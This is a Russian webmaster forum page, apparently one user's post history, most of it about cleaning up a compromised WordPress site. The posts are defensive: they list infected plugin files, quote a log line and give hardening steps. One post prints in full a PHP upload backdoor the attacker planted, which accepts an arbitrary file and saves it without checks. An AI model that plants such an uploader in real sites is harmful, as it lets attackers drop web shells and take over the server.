psics

psics
Рейтинг
130
Регистрация
02.04.2009
Вирусы
SeVlad:
А что его расшифровывать - он не зашифрован. Это форма, через которую заливают вирь под видом картинки.

это мне понятно, обычная форма загрузки файла - шелл туда впихивал

SeVlad:
Про 4300 0000 не понял.

а вот это тот файл, который залит имеет вид если открыть блокнотом

4300 0000 2f76 6172 2f77 7777 2f6b 7568

6e69 6e61 7669 626f 722f 6461 7461 2f77

7777 2f6b 7568 6e69 2d6e 612d 7669 626f

вот хочу увидить этот код..

Вирусы

В общем еще нашел прикол

код был в 404 ошибке - так видимо заливали шелл. Потом нашел 90 вирусняков - каспер - трояны - почистил. Натыкал этот хацкер вот такие хернюшки 

<?php

if(isset($_POST['Submit'])){

    $filedir = ""; 

    $maxfile = '2000000';



    $userfile_name = $_FILES['image']['name'];

    $userfile_tmp = $_FILES['image']['tmp_name'];

    if (isset($_FILES['image']['name'])) {

        $abod = $filedir.$userfile_name;

        @move_uploaded_file($userfile_tmp, $abod);

  

echo"<center><b>Done ==> $userfile_name</b></center>";

}

}

else{

echo'

<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';

}



?>

В общем это временный файл залитый. Как можно его расшифровать? Код такого вида 

4300 0000

Из 16теричной системы перевести в обычную читабельную систему счисления?

Как вывести сайт из под АГС-40 (сайты в ГГЛ) предновогодний вброс!

мне нравится фраза. А если это спам и попал к вам несколько раз поставь + :)

Вирусы
SeVlad:

батенька, да он же больной.

всю ночь не спал, думал откуда эта фразка то)

вспомнил с Маши и медведя)

Тоже дети?)))

Вирусы
SeVlad:
Я не юзаю этот плаг. Тем более что он коммерческий, а тянуть всякую Г с помоек (особенно при наличии альтернатив) я как-то желанием не горю :)

1. Обновить плаг (а лучше заменить на честный из оф репо или вообще выкинуть слайдер на помойку прошлого :) )
2. Сравнить оригинальные файлы дистра+плагов+темы с тем, что на сайте (спец ПО для синхронизации или правильным файл-менеджером)
3. Просканировать новые (относительно п2) файлы айболитом
4. Посмотреть глазками верхние каталоги на сервере (СПанель?) на наличие левых\подозрительных названий файлов.

Проверить свой ПК и смену паролей, конечно не плохо, но в данном случае оно не связано.

Подумаю о смене плагина. Или сам напишу корявый слайдер))

Я проверял не ПК. А скачал на локальный комп сайт и проверял ту папку

Вирусы
erahost_ru:
недавно у одного клиента так же была проблема с этим же плагином.. revslider. похоже плагин уязвим. спама еще небыло с сайта? Установите самую новую версию плагина и проверьте все плагины на сайте. Например в моем случае вирь был еще в wp-content/plugins/backupwordpress/assets/ файлы diff.php menu.php , антивирусы их не брали. проверьте файлы сайта на последние изменения

да именно спам и спалил)

---------- Добавлено 25.12.2014 в 18:21 ----------

SeVlad:
Не правильный вывод - нет взаимосвязи :) Не факт что нет виря, а сторонний ресурс или нет посылает ПОСТ тебе скажет ИП, который ты не показал строке лога (и показывать не нужно - просто сравни с ИП своего сервака).
Кроме того лучше получить само тело запроса. Оно тоже должно быть в логах, но для этого нужно повышать (или понижать - я не знаю как где будет правильно ;) ) уровень логирования

---------- Добавлено 25.12.2014 в 17:29 ----------


батенька, да он же больной. Ну т.е. его старые версии.

ip был хостинга. И файл 

Распознать поражение сайта вредоносным ПО можно оценив наличие файла wp-includes/js/swobject.js
есть. А вот 
wp-includes/template-loader.php новой функции "FuncQueueObject".
- нету. Это норм?

---------- Добавлено 25.12.2014 в 18:28 ----------

И так мои дальнейшие действия:

1 - удалить файл c который написан выше? (не будет ли последствий после удаления)

2 - на все файлы поставить права 644? (будет ли норм работать вп?)

3. все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает

deny from all

4. удаляем все ненужные плагины и шаблоны

5. обновляем cms и оставшиеся плагины до свежих версий

6. сканируем свой комп на вирусы Касперским и AVZ (каспер ничего не видит и в текущем варианте)

7. после проверки компьютера на вирусы меняем все пароли у сайта и хостинга (включая пароль от БД). И делаем это раз в два месяца хотя бы.

Вирусы

wp-content/plugins/revslider/rs-plugin/assets/header.php

Вирусы

[24/Dec/2014:23:47:56 +0300] "POST /wp-content/old/plugins/woocommerce-custom-tabs/advanced-custom-fields/code.php HTTP/1.0" 404 151 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

вот тут еще одно обращение к одному файлу, но нету его кода, тоже похоже вирус.

Поиск по сайту тоталом со словом n1c1ae6 ничего не дал. Тогда вывод - с постороннего ресурса посылают запрос или зашифровано

Вирусы
AlexVenga:
приходит через ПОСТ запрос от пользователя - у вас нигде не отображается)))
Смотрите логи доступа

что приходит через пост я и сам вижу. А с чего видно что от пользователя? а не из файла?

---------- Добавлено 25.12.2014 в 15:52 ----------

ivan-lev:
Сюда приходит из $_POST-запроса.
Всё что приходит - выполняется.
Чистить-сносить...
p.s. Создавать темы в правильном разделе

снесено, но надо ж дыру найти... Вот и пытаюсь узнать откуда ноги растут..

По поводу раздела - возможно и не правильно создал...

wordpress конфликт jquery при добавлении плагина

насколько это правильно я в functions.php добавил функцию

function my_assets() {
	wp_deregister_script( 'jquery' );
}

а в header.php

if(is_front_page()): add_action( 'wp_enqueue_scripts', 'my_assets' ); endif;

так все работает

1... 222324252627282930 ...62
Всего: 619